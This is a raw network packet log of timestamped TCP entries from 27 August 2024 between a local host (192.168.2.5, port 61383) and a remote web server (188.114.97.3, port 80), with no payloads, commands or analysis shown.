                              Aug 27, 2024 09:48:58.834281921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834290028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834294081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834305048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834316015 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834316969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834327936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834330082 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834340096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834351063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834357023 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834388971 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834505081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834515095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834546089 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834562063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834573984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834583044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834593058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834609032 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834641933 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834837914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834849119 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834857941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834868908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834880114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834887028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834893942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834903955 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834904909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834914923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834923029 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834927082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834939003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834950924 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834952116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834963083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834973097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834980011 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834984064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834996939 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.835015059 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.875025988 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.875514030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.875524998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.875534058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.875544071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.875555992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.875566006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.875577927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.875579119 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.875586987 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.875622034 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.875643969 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.918435097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918447018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918457031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918497086 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.918521881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918533087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918589115 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.918634892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918646097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918656111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918665886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918677092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918680906 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.918704987 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.918726921 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.918834925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918845892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918855906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918865919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918883085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918883085 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.918894053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918905020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.918942928 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.919044018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.919054031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.919069052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.919080019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.919090986 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.919126034 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.920881033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.920890093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.920902014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.920985937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.920998096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921008110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921076059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921078920 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.921087027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921130896 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.921147108 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921188116 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.921221972 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921232939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921255112 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921262980 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.921266079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921276093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921299934 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.921325922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921336889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921365023 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.921436071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921447039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921457052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921468019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921487093 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.921519995 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.921544075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921555042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921566010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921574116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921591997 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.921613932 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.921660900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921674013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921684027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921694994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921713114 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.921741009 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.921768904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921780109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921791077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921802044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921819925 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.921860933 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921865940 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.921873093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921881914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921892881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.921925068 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922020912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922032118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922041893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922051907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922063112 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922065020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922076941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922101021 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922113895 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922163963 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922175884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922197104 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922207117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922207117 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922218084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922228098 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922238111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922244072 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922249079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922270060 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922291040 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922342062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922394991 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922487974 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922498941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922508001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922518969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922529936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922535896 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922542095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922554016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922564030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922570944 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922574043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922585964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922593117 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922597885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922614098 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922626972 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922817945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922827959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922837973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922852993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922863960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922868013 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922873974 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922883987 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922893047 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922895908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922907114 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922908068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922919035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922930002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.922931910 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922944069 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.922972918 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.923170090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923181057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923190117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923201084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923211098 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923213959 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.923221111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923232079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923238039 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.923242092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923254013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923263073 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.923264027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923275948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923283100 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.923288107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923305988 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.923326969 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.923502922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923513889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923523903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923535109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923546076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923553944 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.923557043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923568010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923573017 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.923578978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923589945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.923595905 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.923614979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.963910103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.963922024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.963932037 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.964009047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.964020014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.964030981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.964041948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.964092016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.964128017 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.964128017 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.964128017 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.007026911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.007046938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.007286072 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.007908106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.007919073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.007927895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.007961988 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.007982969 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.007986069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.007997036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008007050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008016109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008034945 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.008064032 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.008182049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008193016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008202076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008212090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008223057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008229971 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.008238077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008249044 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.008249998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008260012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008297920 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.008316994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008382082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008392096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008403063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008410931 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.008416891 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.008438110 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.009527922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009569883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009578943 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.009581089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009592056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009620905 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.009671926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009681940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009691954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009701967 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009716988 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.009749889 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.009757996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009799957 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.009862900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009874105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009912968 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.009917021 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009927034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009936094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009947062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009959936 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.009968042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.009989977 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.010018110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010030031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010061979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.010149956 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010159969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010169029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010179996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010190964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010190964 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.010217905 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.010241985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.010293007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010303974 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010313034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010323048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010334969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010335922 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.010346889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010370016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.010391951 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.010399103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010520935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010530949 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010540962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010550976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010562897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010565042 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.010574102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010584116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010591984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.010595083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010610104 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.010632992 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.010709047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010752916 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.010941029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010951042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010960102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010977030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010984898 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.010987997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.010997057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011007071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011014938 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011018038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011029005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011039019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011043072 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011066914 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011082888 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011091948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011101961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011111021 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011121035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011131048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011136055 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:59.011141062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011152029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:59.011154890 CEST6138380192.168.2.5188.114.97.3
